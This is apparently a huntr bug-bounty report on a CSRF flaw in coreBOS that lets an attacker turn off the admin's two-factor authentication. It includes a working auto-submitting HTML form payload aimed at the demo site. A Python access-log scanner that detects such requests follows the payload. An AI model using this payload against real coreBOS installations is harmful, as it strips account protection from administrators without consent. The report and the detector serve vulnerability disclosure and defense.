huntr / 7h3h4ckv157 / 0F5448A6-D551-424F-887D-80F9BCFAA6E4
Sep 01, 2022 - 4:08 p.m.

Attacker can turn off 2FA of the Admin

2022-09-01 16:08:35
7h3h4ckv157
www.huntr.dev
6
csrf attack
admin 2fa
bug bounty

EPSS: 0.001 (Low), percentile 27.0%

Description

An attacker can turn off the admin's 2FA with a CSRF attack.

Steps to reproduce

Step 1: Log in as admin on the demo product and navigate to https://demo.corebos.com/index.php?module=Utilities&action=integration&_op=getconfig2fa&user_list=1

Step 2: Turn on 2FA and close the tab

Step 3: Reopen the account 2FA section and verify it's still on

Step 4: Close the tab again

Step 5: Open the w3schools HTML editor in a new tab

Step 6: Copy this code and run it

<html> 
 <body> 
 <script>history.pushState('', '', '/')</script> 
   <form action="https://demo.corebos.com/index.php"> 
     <meta name="referrer" content="no-referrer"> 
     <input type="hidden" name="module" value="Utilities" /> 
     <input type="hidden" name="action" value="integration" /> 
     <input type="hidden" name="_op" value="setconfig2fa" /> 
     <input type="hidden" name="user_list" value="1" /> 
     <input type="submit" value="Submit request" /> 
   </form> 
   <script> 
     document.forms[0].submit(); 
   </script> 
 </body> 
</html>

Step 7: Done

Successfully launched CSRF attack & 2FA of Admin turned off!
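
A defender-side check for the request used in the PoC above, added here as an example (not part of the original report or of coreBOS): it scans web-server access logs in combined format for `_op=setconfig2fa` requests that arrive with no Referer or with a Referer from another host. The log lines and the host `other-site.example` are constructed, and only requests that carry their parameters in the query string, as the PoC form does, are visible this way.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ... "METHOD target PROTO" status size "referer" "user-agent"
LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)
TRUSTED_HOST = "demo.corebos.com"  # host from the report; set to your own deployment

def suspicious_2fa_changes(lines, trusted_host=TRUSTED_HOST):
    """Return (line_no, reason) for each setconfig2fa request that looks cross-site."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = LINE.search(line)
        if not m:
            continue  # not a combined-format request line
        params = parse_qs(urlsplit(m["target"]).query)
        if params.get("_op") != ["setconfig2fa"]:
            continue  # only the state-changing 2FA operation is of interest
        referer = m["referer"]
        if referer in ("", "-"):
            # The PoC page asks the browser to omit the Referer header.
            hits.append((no, "no Referer"))
            continue
        host = urlsplit(referer).hostname
        if host != trusted_host:
            hits.append((no, "foreign Referer: " + (host or referer)))
    return hits

# Constructed sample log lines (not taken from any real server).
BASE = "/index.php?module=Utilities&action=integration&user_list=1&_op="
SAMPLE = [
    '198.51.100.7 - - [01/Sep/2022:16:01:10 +0000] "GET ' + BASE
    + 'getconfig2fa HTTP/1.1" 200 5120 "https://demo.corebos.com/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2022:16:02:31 +0000] "GET ' + BASE
    + 'setconfig2fa HTTP/1.1" 200 812 "https://demo.corebos.com/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2022:16:07:02 +0000] "GET ' + BASE
    + 'setconfig2fa HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2022:16:08:35 +0000] "GET ' + BASE
    + 'setconfig2fa HTTP/1.1" 200 812 "https://other-site.example/x.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, reason in suspicious_2fa_changes(SAMPLE):
        print(f"line {line_no}: {reason}")
```

A missing Referer can also come from privacy settings or proxies, so treat hits as leads to correlate with the admin's own session activity rather than as proof of an attack.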
